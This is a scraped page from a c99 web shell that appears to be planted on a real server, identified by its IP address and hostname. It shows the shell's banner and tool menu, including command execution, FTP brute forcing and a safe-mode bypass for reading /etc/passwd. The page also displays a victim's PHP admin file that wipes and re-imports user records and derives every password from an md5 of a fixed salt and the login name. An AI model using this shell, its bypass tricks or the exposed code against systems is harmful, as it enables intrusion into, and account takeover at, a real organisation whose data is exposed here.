110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/person/admin/ drwxr-xr-x Free 52.32 GB of 127.8 GB (40.94%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/person/admin/ drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: processaddpersonex.php (4.08 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../link/function.php";
include_once "../class/clsTable.php";
include_once "../class/clsDepartment.php";
include_once "../class/clsPerson.php";
include_once "../class/clsDepartmentPE.php";
include_once "../class/clsPersonPE.php";
include_once "../class/clsUmuser.php";
include_once "../class/clsUmUserGroup.php";



$oUs = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_UMS'], $GLOBALS['DBUSER_UMS'], $GLOBALS['DBPASS_UMS']);
$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);


$oDP = new Department($oC);
$oPS = new person($oC);
$oUms= new umuser($oUs);
$oUms2= new umuser($oUs);
$oUg=new umusergroup($oUs);

if($method=="addperson"){
	$oPS->RSperson2();
	while($oPS->GetRecord()){
		$oPS->Delete();     //-->> ЕєўйНБЩЕг№°Т№ўйНБЩЕ  eotk person
	}

	 $oUms2->RSumuser2();
	 while($oUms2->GetRecord()){
	    $oUms2->Delete();    //-->> ЕєўйНБЩЕг№°Т№ўйНБЩЕ  umstk   Umuser
	}
	
    $oUg->RSumusergroup2();
	while($oUg->GetRecord()){ 
		$oUg->Delete();     //-->> ЕєўйНБЩЕг№°Т№ўйНБЩЕ  umstk   UmUserGroup
	}	

	
		

//------------add person-------------------------
	$UPath='uploadfile/'.$filename;	
	$fp = fopen($UPath, "r");
	$p=2;
	while(!feof($fp)) {
		//echo "---------------------------------------------------------------------------------------------------------------------<br>";						
				$char = fgets($fp);
				list($prefixId, $name, $surname, $deptId, $loginname,$adminId,$hireId) = split('[,]', $char);
				$prefixId = rtrim($prefixId);
				$name = rtrim($name);        
				$surname = rtrim($surname);
				$deptId= rtrim($deptId);
				$loginname=strtolower(rtrim($loginname));
				$adminId = rtrim($adminId);
				$hireId= rtrim($hireId);
				
				if($prefixId!="" && $name!=""  && $surname!="" && $deptId!="" && $loginname!="" && $adminId!="" && $hireId!=""){
					//---------------------------add data to people
						echo "+++++people table<br>";
						$oPS->AddNew();
						$oPS->personId=$p;
						echo "personId".$oPS->personId."<br>";
						$oPS->deptId=$deptId;
						echo "deptId".$oPS->deptId."<br>";
						$oPS->workGpId="";
						$oPS->prefixId=$prefixId;
						echo "prefixId".$oPS->prefixId."<br>";
						$oPS->fName=$name;
						echo "fName".$oPS->fName."<br>";
						$oPS->lName=$surname;
						echo "lName".$oPS->lName."<br>";
						$oPS->fStatus="1";
						$oPS->adminId=$adminId;
						$oPS->fRetire="0";
						$oPS->hireId=$hireId;
						$oPS->Save();
						$count=$p;
						$p++;
						
					//---------------------------add data to ums
						echo "+++++umuser<br>";
						$oUms->AddNew();
						$oUms->UsID=$oUms->GetNextCode();
						echo "UsID".$oUms->UsID."<br>";
						$oUms->UsName=$name." ".$surname;
						echo "UsName".$oUms->UsName."<br>";
						$oUms->UsLogin=$loginname;
						echo "UsLogin".$oUms->UsLogin."<br>";
						$oUms->UsPassword=md5("O]O".strtolower(rtrim($loginname))."O[O");
						$oUms->UsPsCode=$count;
						echo "UsPsCode".$oUms->UsPsCode."<br>";
						//echo "personId".$oPe->personId."<br>";
						$oUms->UsWgID='';
						$oUms->UsQsID='';
						$oUms->UsAnswer='';
						$oUms->UsEmail='';
						$oUms->UsActive='';
						$oUms->UsAdmin='';
						$oUms->UsDesc='';
						$oUms->UsPwdExpDt='';		
						$oUms->UsUpdDt='';
						$oUms->UsUpdUsID='';
						$oUms->UsSessionID='';
						$oUms->Save();
										
						//---------------------------add data to ums
						echo "+++++umusergroup <br>";
						$oUg->AddNew();
						$oUg->UgID=$oUg->GetNextCode();
						echo "UsID".$oUg->UgID."<br>";
						$oUg->UgGpID="108";   //јЩйгўй·СиЗд»ўН§КТГєГГі
						echo "UgGpID".$oUg->UgGpID."<br>";
						$oUg->UgUsID=$oUms->UsID;
						echo "UgUsID".$oUg->UgUsID."<br>";
						$oUg->Save();
						echo "--------------------------------<br>";

						
						
				} //if not null
	} //while
}

echo "<meta http-equiv='refresh' content='0; URL=ImportPsExcel.php?success=1'>";
?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--